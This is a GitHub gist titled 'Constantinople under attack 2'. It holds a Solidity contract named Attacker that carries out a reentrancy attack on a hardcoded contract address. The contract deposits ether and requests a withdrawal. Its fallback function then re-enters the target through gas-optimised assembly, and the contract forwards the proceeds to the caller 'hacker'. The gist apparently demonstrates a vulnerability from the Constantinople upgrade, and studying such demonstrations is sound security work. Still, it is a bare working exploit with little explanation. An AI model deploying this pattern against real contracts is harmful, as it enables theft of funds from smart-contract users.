Created
January 16, 2019 06:15
-
-
Save k06a/3b89a97f3bbe145dcb00c7eabd8979f4 to your computer and use it in GitHub Desktop.
Constantinople under attack 2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity ^0.5.0; | |
| contract Attacker { | |
| address payable constant public token = 0x07d67Cb7736c9812277f6d1921fa872bff9Ea160; | |
| uint flag; | |
| function attack() public payable { | |
| require(msg.value > 0); | |
| // Deposit | |
| (bool ret1,) = token.call.value(msg.value)(""); | |
| require(ret1); | |
| // Withdrawal request | |
| flag = 0; | |
| flag = 1; | |
| (bool ret2,) = token.call.value(0)(""); | |
| require(ret2); | |
| // Forwarding funds to the hacker | |
| msg.sender.transfer(address(this).balance); | |
| } | |
| function () external payable { | |
| // Rewritten in ASM to optimize gas | |
| assembly { | |
| if eq(flag_slot, 1) { | |
| sstore(flag_slot, 2) | |
| let r := call(gas, 0x07d67Cb7736c9812277f6d1921fa872bff9Ea160, 0, 0, 0, 0, 0) | |
| } | |
| } | |
| // | |
| // if (flag == 1) { | |
| // flag = 2; | |
| // token.call.value(0)(""); | |
| // } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment